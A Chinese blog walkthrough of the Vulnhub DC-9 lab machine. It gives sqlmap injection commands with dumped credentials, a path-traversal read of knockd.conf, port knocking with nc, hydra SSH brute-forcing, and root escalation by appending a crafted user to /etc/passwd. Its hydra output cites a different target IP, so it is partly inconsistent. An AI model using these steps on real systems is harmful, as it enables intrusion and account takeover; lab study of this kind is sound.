Vulnhub-DC-9 靶机复现完整过程

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量943 收藏 25
点赞数 30
分类专栏: # 红队打靶 文章标签: 网络安全 web安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Continuejww/article/details/134919865
版权
文章详细描述了在网络安全环境中,从搭建KaliLinux环境开始,通过信息收集、发现SQL注入漏洞并利用SQLMap工具进行攻击,包括数据库爆破、内容获取,最终实现提权的过程。涉及端口敲门技术和密码破解。
摘要由CSDN通过智能技术生成

一、搭建环境

kali的IP地址是:192.168.200.14
DC-9的IP地址暂时未知

二、信息收集

1、探索同网段下存活的主机

arp-scan -l #

image.png
2、探索开放的端口
image.png
开启端口有:80和22端口

3、目录扫描

image.png

访问80 端口显示的主页面
image.png

分别点击其他几个页面
可以看到是用户的信息
image.png
此页面下出现的搜索框。可能会存在xss漏洞和SQL注入漏洞
image.png
最后一个需要正确输入用户名和密码才可以登录
image.png
输入什么都会跳转这个页面
image.png
用抓包的形式进行尝试,点击进行抓包测试

三、漏洞探测

sql注入

运用工具SQLMAP
image.png
将捕获的数据要包放到sqlmap的安装目录下,创建一个新的文件
image.png
在cmd命令行上输入以下指令

1、获得数据库

python sqlmap.py -r 1.txt --dbs --batch # 第一种方法
python sqlmap.py -u "http://192.168.200.6/results.php" --data "search=1" --dbs 第二种方法

image.png

2、获取数据表

python sqlmap.py -r 1.txt -D Staff --tables # 第一种方法
python sqlmap.py -u "http://192.168.200.6/results.php" --data "search=1" -D Staff --tables
# 第二种方法

image.png

3、爆字段

sqlmap.py -r 1.txt -D Staff -T Users --columns # 第一种方法

python sqlmap.py -u "http://192.168.200.6/results.php" --data "search=1" -D Staff -T Users --columns
# 第二种方法

image.png

4、暴内容

python sqlmap -u "http://192.168.200.6/results.php" --data "search=1" -D Staff -T Users --dump
# 第一种方法
python sqlmap.py -r 1.txt -D Staff -T Users --dump # 第二种方法

image.png

+--------+----------+----------------------------------+
| UserID | Username | Password                         |
+--------+----------+----------------------------------+
| 1      | admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+--------+----------+----------------------------------+

经过md5加密的admin用户密码,在线md5解码一下

账号:admin  
密码:transorbital1

登录成功
image.png

爆破另外一个数据库(Users)(只是用使用一种方法)
1、爆破数据库

python sqlmap.py -r 1.txt --dbs --batch

image.png+
2、获取数据库

python sqlmap.py -r 1.txt -D Users --tables

image.png
3、爆破字段

python sqlmap.py -r 1.txt -D users -T UserDetails --columns

image.png
4、爆破内容

python sqlmap.py -r 1.txt -D users -T UserDetails --dump

python sqlmap -r 1.txt -D users -T UserDetails -C username,password --dump

image.png

回到原网页

文件包含

根据底部的信息File does not exist,可以推断,有可能存在文件包含漏洞
image.png

选择manage.php进行尝试文件包含漏洞,成功,经过百度,可以知道有个敲门打开SSH端口的事情
image.png

端口保护之端口敲门

大致就是按一定的顺序访问端口可以达到开启和关闭某个端口的机制
通过查看…/…/…/…/etc/knockd.conf文件,结合搜索到的相关知识,知道用nc分别去尝试这三个端口可以打开SSH端口

通过查看../../../../etc/knockd.conf文件,结合搜索到的相关知识,
知道用nc分别去尝试这三个端口可以打开SSH端口

经过百度,进行敲门
nc 192.168.200.6 7469
nc 192.168.200.6 8475
nc 192.168.200.6 9842

nmap再次扫描一下发现22端口开放了,amazing!!!
image.png

使用之前得到的用户名和密码去爆破ssh服务

hydra -L username.txt -P password.txt ssh://192.168.200.6 

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-31 04:04:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 192.168.200.6   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.200.6   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.200.6   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found

三个用户家目录下什么也没有
按顺序先选择fredf登录B4-Tru3-001
ssh fredf@192.168.200.6
查看sudo -l成功
image.png

image.png
选择chandlerb登录UrAG0D!
ssh chandlerb@192.168.200.6
查看sudo -l失败
image.png
选择joeyt登录Passw0rd
ssh joeyt@192.168.200.6
查看sudo -l失败
image.png
选择janitor登录Ilovepeepee
ssh janitor@192.168.200.6
查看sudo -l失败
image.png
使用janitor登陆,发现了一个密码文件,使用janitor登陆,发现了一个密码文件

janitor@dc-9:~$ ls -al
total 20
drwx------  4 janitor janitor 4096 Aug 31 18:38 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Aug 31 18:05 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
-rw-r--r--  1 janitor janitor    6 Aug 31 18:42 test.txt
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts


[22][ssh] host: 192.168.200.6   login: fredf   password: B4-Tru3-001

经过四个账户的查询发现只有fredf有一定权限

cd /opt/devstuff/dist/test/
ls -al

image.png
可以发现他具有一个特殊权限,可以运行一个test脚本。

fredf@dc-9:~$  /opt/devstuff/dist/test/test --help
Usage: python test.py read append
fredf@dc-9:~$ 
# 这个test的作用就是把一个文件中的内容append到另一个文件中。
我们首先想到利用test往passwd文件中写入用户信息,便这个用户口令必须是加密过的。

image.png

提权

在janitor中发现了几个密码,加到我们的密码字典中
然后再次使用hydra爆破发现了第四个可以用ssh登录的账号和密码
登录后sudo -l发现test文件有root权限

image.png
image.png
切换到test目录看下,找下这个test.py,在/opt/devstuff目录下,脚本的作用就是将第一个文件的内容附加到另一个文件里面去
image.png
在etc/passwd文件里进行写入账号密码
运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径

openssl passwd -1 -salt dc 123456
echo 'dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:/bin/bash' >> /tmp/dc
sudo ./test /tmp/dc /etc/passwd

3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径
image.png

爱吃大米饭'
关注
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
dc-9 靶机渗透学习
..
03-27 5558
信息收集 用nmap扫描当前网段 nmap -sP 192.168.202.0/24 对靶机进行端口扫描 nmap -A -p- -v 192.168.202.148 访问靶机的80端口,进行框架识别 无框架的页面,尝试web服务漏洞,用dirsearch进行扫描,没有发现可利用的文件。 漏洞利用 尝试从页面模块处寻找漏洞,发现在search的地方存在SQL注入漏洞。 测试过程 通常我们测试SQL注入漏洞都是输入一个单引号或者双引号,根据返回的报错信息判断是.
DC1-9靶机提权总结
问彡心的博客
09-27 1843
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1694
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
DC-9靶机渗透测试
读书 买花 长大
05-21 576
DC-9
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3106
Vulnhub靶机渗透学习——DC-9
Vulnhub-DC-1 靶机复现完整过程
Continuejww的博客
07-19 248
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec欢迎指正!
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub-DC-4 靶场渗透练习
weixin_52451257的博客
01-27 2980
靶场地址: DC: 4 ~ VulnHub 第一步:信息收集 nmap -sn -T4 192.168.231.0/24 nmap -A -p- 192.168.231.152 正在上传…重新上传取消 dirb http://192.168.231.152 nikto -h http://192.168.231.152 python3 dirmap.py -i http://192.168.231.152 -lcf ls python3 dirsearch -u htt..
Vulnhub-Basilic
KAKA的博客
07-10 611
灰常有意思的一次训练,需要对 python 沙箱逃逸有一定程度的理解,让我们开始游戏吧~ [注:从源地址下载出得知需要拿到 4 个 flag] 利用 namp 扫描获取目标 IP 地址:nmap -sn 192.168.67.1/24 继续获取目标的相关开放端口等信息:namp -A -p- 192.168.67.18 可以看到下列信息: http服务对应的端口是 5000 ,而不是 80,其次还开放了 22 --> ssh 服务,我们登陆到 web 页面游玩下~ 点击 contact me,得到
[渗透测试篇]VulnhubDC-1靶机从入门到入坑
qq_43668710的博客
04-16 1304
0x01 前言 这是我第一次真正开始接触渗透测试的靶场,因为之前见过DC系列的靶机,于是我就决定以DC系列的靶机开始入门渗透测试,尽管目前都是基于大佬们的文章进行复现,但这丝毫没有使我的兴趣有丝毫减少! DC-1 实验环境 攻击机:kali 目标机:DC-1 涉及工具 Netdiscover Droopescan Searchsploit MetaSploit 0x02 渗透思路 思路1: ...
DC-9靶机
weixin_45778886的博客
04-10 3760
信息收集 存活主机及其端口探测 nmap -sn 192.168.124.0、24 nmap -sS -A 192.168.124.21 目录扫描 网站banner信息收集 通过测试,发现sql注入 漏洞利用 sql注入 把请求信息导出为dc9.txt,接下来用SQLmap进行遍历 sqlmap -r dc9.txt 接下来使用sqmap导出数据 sqlmap.py -r dc9.txt ‐‐dbs sqlmap.py -r dc9.txt -D users --tables sqlmap.py
DC-9靶机渗透
0XAXSDD的博客
06-16 637
DC-9靶机渗透 打开nmap扫描一下: 开放了80端口,和22端口,只是22端口被保护着 无法ssh爆破 然后对着web一阵狂扫,找到了一个sql注入漏洞 直接丢进sqlmap跑 最好拿到了admin账号的口令,和一些用户账号 然后admin登录一下 一个增加用户的功能,我最初的想法是: 因为那个display all records 是一个php文件。会从数据库读取用户信息展示出来,我就想着自己增加一个用户信息,然后里面放着一句话木马。就可以执行php代码,蚁剑去连了 结果了试了,被过滤了,gi
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8458
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2297
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)——自学2024
2401_84466325的博客
09-09 1882
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1951
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值